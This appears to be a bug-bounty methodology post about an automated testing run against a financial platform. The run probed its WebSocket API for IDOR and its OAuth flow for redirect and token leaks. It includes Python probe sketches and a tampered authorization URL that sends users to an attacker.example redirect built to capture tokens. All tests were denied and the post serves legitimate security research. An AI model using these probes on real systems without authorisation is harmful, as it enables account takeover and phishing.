Tags: authentication, idor, oauth, methodology, automation

All Ten Said No

Run #27 was the first authenticated test session — 35 minutes, 10 hypotheses, 10 server responses. None of them were “here’s your data.”

Permission denied. Object not found. Empty response. Permission denied. Permission denied. Five weeks ago, any of those server responses would have been hypothetical. Today they’re documented, reproducible, and filed as Tier 1 negative evidence. The auto-bounty system had its first authenticated session this morning. The server said no to everything. That’s the story — and it’s a good one.

Getting Through the Door

Run #27 started with the structural fix from Run #26: the task selector now has an apply route. First order of business was account registration. The apply prompt instructs the system to spin up Playwright through mitmproxy, navigate to the target’s registration flow, and create two separate virtual test accounts in different jurisdictions.

Both accounts registered without a CAPTCHA. Thirty seconds of Playwright execution and the system had two independently authenticated sessions ready — one with a European regulatory profile, one without. With both sessions live, the attack phase could begin.
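The registration step could be sketched roughly like this, assuming Playwright routed through a local mitmproxy instance. The signup URL, form selectors, jurisdiction field, and success signal are all placeholders, not the target’s real flow:

```python
# Sketch: register two test accounts via Playwright behind mitmproxy.
# All URLs and selectors below are hypothetical placeholders.
from dataclasses import dataclass

MITMPROXY = "http://127.0.0.1:8080"  # assumed local proxy address

@dataclass
class TestAccount:
    email: str
    password: str
    jurisdiction: str  # e.g. "eu" vs "row" (rest of world)

def launch_args(proxy: str = MITMPROXY) -> dict:
    """Browser options: route traffic through mitmproxy and accept its
    re-signed TLS certificates so interception works."""
    return {
        "proxy": {"server": proxy},
        # mitmproxy re-signs TLS; without this, Playwright rejects the cert
        "ignore_https_errors": True,
    }

def register(account: TestAccount, signup_url: str) -> None:
    # Imported lazily so the config above stays usable without a browser.
    from playwright.sync_api import sync_playwright

    opts = launch_args()
    with sync_playwright() as p:
        browser = p.chromium.launch(proxy=opts["proxy"])
        context = browser.new_context(
            ignore_https_errors=opts["ignore_https_errors"]
        )
        page = context.new_page()
        page.goto(signup_url)
        # Selector names are illustrative; real flows differ per target.
        page.fill("input[name=email]", account.email)
        page.fill("input[name=password]", account.password)
        page.select_option("select[name=country]", account.jurisdiction)
        page.click("button[type=submit]")
        page.wait_for_url("**/dashboard**")  # crude success signal
        # Persist the authenticated session for the attack phase.
        context.storage_state(path=f"session-{account.jurisdiction}.json")
        browser.close()

# Example invocation (requires playwright and a running mitmproxy):
#   register(TestAccount("a@test.example", "pw-redacted", "eu"),
#            "https://target.example/signup")
```

Persisting `storage_state` per account is what makes the later cross-account tests cheap: each probe can reuse a saved session instead of re-authenticating.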

Accounts registered: 2
Hypotheses tested: 10
Tools executed: 112
Session duration: 35m

The WebSocket API: A Wall Well-Built

The threat model for this program had flagged a WebSocket-based trading API as the primary attack surface. The hypothesis was access control: could an authenticated user reference another user’s objects by iterating identifiers? Three specific patterns to test:

Read access — request an open contract belonging to a different account. Result: empty object returned. The server doesn’t error, doesn’t 403 — it just quietly returns nothing. No data leak. The silence is correct behavior.

Write access — attempt to sell or close a contract belonging to a different account. Result: object-not-found class error. The server doesn’t ask who you are before telling you the object doesn’t exist. This is a classic pattern for safe ID spaces: respond as if the object never existed rather than as if you’re unauthorized to see it. Both responses are correct; this one also prevents enumeration.

Cross-account read — Account A authenticates, requests a contract known to belong to Account B. Result: empty. The cross-account isolation test — the one that requires two independent sessions — confirmed that account boundaries are enforced server-side, not just by session scope.

For financial operations, the results were identical: ownership errors for every attempt to reference another account’s funds or balances. The API validates that the requesting session owns the target resource. It does this consistently, across all tested call types, with Tier 1 evidence: two real accounts, live server, observed responses.
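The three probe patterns above could be sketched as follows, assuming a JSON-over-WebSocket protocol in which contracts are fetched by numeric ID. The message schema (`get_contract`, `contract_id`) is invented for illustration, and the transport itself is omitted:

```python
# Sketch: build a cross-account contract probe and classify the reply.
# Field names are hypothetical, not the target's real protocol.
import json

def probe_message(contract_id: int, req_id: int = 1) -> str:
    """Request a contract by ID from whichever session sends it."""
    return json.dumps({
        "get_contract": 1,
        "contract_id": contract_id,
        "req_id": req_id,
    })

def classify(raw: str) -> str:
    """Map a server reply onto the outcomes observed in this session."""
    msg = json.loads(raw)
    if "error" in msg:
        # object-not-found / permission-denied class errors
        return f"denied:{msg['error'].get('code', 'unknown')}"
    body = msg.get("get_contract") or {}
    # An empty object is the "quiet nothing" response: no data, no error.
    return "empty" if not body else "data-returned"
```

Sending `probe_message()` over each account’s socket and running `classify()` on the replies reproduces the read, write, and cross-account checks; anything classified `data-returned` for a foreign ID would have been the IDOR.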

The OAuth Flow: Nine Denials and One Interesting Redirect

The second attack surface was the OAuth implementation. This financial platform supports third-party app integration through a custom OAuth server, and custom OAuth servers are historically interesting. The hypotheses:

Redirect URI passthrough — inject an attacker-controlled redirect URI into the authorization URL, see if it passes through to the OAuth server. The platform’s login gateway strips the redirect parameter before constructing the OAuth request downstream. The chain breaks at the first hop. No token leak.

Implicit flow token leak — request response_type=token to attempt to surface tokens in a redirect fragment. Same result: the login gateway sanitizes the request. No implicit token issued.
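Both redirect-tampering checks reduce to the same mechanic: craft an authorization URL with hostile parameters, then compare it against the OAuth request the login gateway actually issued (as observed in the proxy). A minimal sketch, with placeholder hostname and client_id:

```python
# Sketch: build a tampered authorization URL and check whether the
# injected redirect_uri survived the gateway. Endpoint and client_id
# are placeholders.
from urllib.parse import urlencode, urlparse, parse_qs

AUTHZ = "https://oauth.target.example/authorize"  # assumed endpoint

def tampered_authz_url(attacker_uri: str, response_type: str = "code") -> str:
    """Authorization URL with an attacker-controlled redirect_uri; passing
    response_type="token" covers the implicit-flow variant."""
    params = {
        "client_id": "public-client",   # placeholder
        "response_type": response_type,
        "redirect_uri": attacker_uri,
        "scope": "read",
        "state": "probe-1",
    }
    return f"{AUTHZ}?{urlencode(params)}"

def params_survived(observed_downstream_url: str, attacker_uri: str) -> bool:
    """Did the injected redirect_uri pass through to the request the
    gateway actually sent to the OAuth server?"""
    qs = parse_qs(urlparse(observed_downstream_url).query)
    return qs.get("redirect_uri", [None])[0] == attacker_uri
```

In this session, `params_survived` would have come back false for both checks: the gateway strips the hostile parameter before the OAuth server ever sees it.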

PKCE plain downgrade — check whether the OAuth server accepts code_challenge_method=plain instead of S256. It does — but this is explicitly listed in the server’s published OIDC configuration. Not a misconfiguration. By design.
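The downgrade check itself is simple, assuming the server publishes a standard OIDC discovery document: look for `plain` in `code_challenge_methods_supported`, and compare against the S256 method defined in RFC 7636. A sketch:

```python
# Sketch: PKCE S256 challenge computation plus the discovery-document
# downgrade check. The threat: with method=plain, code_challenge equals
# code_verifier, so a leaked challenge is a leaked verifier.
import base64
import hashlib

def s256_challenge(verifier: str) -> str:
    """code_challenge for method S256 per RFC 7636:
    BASE64URL(SHA256(verifier)), without padding."""
    digest = hashlib.sha256(verifier.encode("ascii")).digest()
    return base64.urlsafe_b64encode(digest).rstrip(b"=").decode("ascii")

def plain_downgrade_allowed(discovery_doc: dict) -> bool:
    """True if the server advertises the weaker 'plain' method.
    Advertised support is not itself a bug, which is why this
    hypothesis closed as 'by design' rather than as a finding."""
    methods = discovery_doc.get("code_challenge_methods_supported", [])
    return "plain" in methods
```

RFC 7636 allows servers to support `plain` for legacy clients; the risk only materializes if a client that could use S256 is forced down to it, which is a different (untested) hypothesis.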

Custom app registration with attacker redirect URI — this one was different. The platform allows any authenticated user to register a custom OAuth application with an arbitrary redirect URI. Set up an app with redirect_uri=https://attacker.example, trigger the OAuth authorization flow, and observe what happens at the consent step.

The redirect to the attacker domain happened. A real 302 to the registered attacker URL, logged in the proxy. The user never saw a consent screen. The OAuth server redirected immediately on authorization.

And then: error=access_denied. No authorization code. No token. The error was appended as a query parameter to the redirect. The attacker domain receives the request — which confirms the user visited the page — but receives nothing usable for account access.
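Deciding whether that redirect closes the chain comes down to what lands on the callback URL. A sketch of the classification, using standard OAuth 2.0 response shapes; the outcome labels mirror this session’s write-up:

```python
# Sketch: classify the Location header observed in the proxy for the
# attacker-registered callback. Standard OAuth 2.0 places the code in
# the query string and implicit-flow tokens in the fragment.
from urllib.parse import urlparse, parse_qs

def classify_callback(location: str) -> str:
    parsed = urlparse(location)
    query = parse_qs(parsed.query)
    fragment = parse_qs(parsed.fragment)
    if "code" in query or "access_token" in fragment:
        return "chain-closes"   # usable credential delivered
    if query.get("error") == ["access_denied"]:
        # Attacker learns the user visited, but gets nothing usable.
        return "redirect-only"
    return "unclassified"
```

The session’s observed redirect falls into `redirect-only`: the 302 fires, the attacker domain is hit, and the only payload is the error parameter.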

The redirect that went nowhere

The custom app registration OAuth redirect is the closest thing to a real finding in this session. The redirect works: any user can register an OAuth app with an arbitrary domain and trigger a redirect to that domain after login, without a consent screen. That’s a phishing vector — a convincing one, since it originates from the platform’s own OAuth server. But error=access_denied means no tokens are delivered. The attack chain terminates at “user is redirected to attacker site” with nothing to show for it beyond knowing the user attempted to authorize. Without an authorization code or token in that redirect, the impact ceiling is phishing and account enumeration — not account takeover. Session JSON says: not reportable. The chain doesn’t close.

What Negative Results Actually Mean

Ten hypotheses. Nine clearly denied. One partially confirmed but chain-incomplete. The output of this session is not zero — it’s a map.

Before this session, the threat model for this program was a set of guesses derived from source map analysis, historical endpoint data, and generic knowledge about the class of application. The hypotheses were informed speculation. Now those same hypotheses are closed, each one backed by a specific observed server response from a real authenticated session.

That matters for two reasons. First, it eliminates false leads: we won’t spend more time on contract IDOR because we have Tier 1 evidence that the server enforces ownership. The next session doesn’t start from scratch — it starts from a narrowed attack surface. Second, it defines what to look for next. The financial transfer API said no cleanly. The OAuth app registration said “almost.” The almost has leads: postMessage origin validation, token cookie exposure windows during redirects, account management flow authentication, staging environment behavior.

Hypotheses tested: 10
  Clearly denied (Tier 1): 8
  By design (Tier 2): 1
  Partially confirmed, chain incomplete: 1
  Reportable: 0
Negative results documented: 5 (cross-account isolation, financial isolation, redirect sanitization)
Leads generated: 6

Negative results are reconnaissance

The common framing of a security test session is: you either find something or you don’t. This framing is wrong. A session where ten hypotheses are tested and ten return documented denials has produced ten pieces of evidence — each one a constraint on the remaining attack surface. The server that enforces ownership on all contract operations is now a known quantity. You don’t need to re-test it. The surface that was infinite before the session is now finite after it: you have rules about what this server does, confirmed under real conditions. Map the surface by elimination and you eventually find the part that the map doesn’t cover. That’s where bugs live.

What’s Next

The session closed with six documented next actions, among them: test postMessage origin validation for cross-window token injection, check token cookie exposure windows during the redirect flow, test the account management and cashier flows for authentication state assumptions, and investigate whether the staging environment handles the OAuth flow differently from production.

One structural blocker remains: both test accounts are virtual accounts. Some authorization behaviors — particularly around the OAuth app authorization flow — may differ for real-money accounts. The “error=access_denied” response on the custom app redirect could theoretically be a virtual-account restriction rather than a permanent denial. Confirming that requires a funded account, which requires a manual user action.

The apply cycle is running. The next noon session will pick up where this one stopped — not at account registration, not at API probing, but at the six specific leads this session produced. Five weeks of preparation generated a threat model. Run #27 generated evidence. The next run narrows the surface further.

Ten times the server said no. Ten documented responses are a better starting point than ten untested guesses. Denial is data.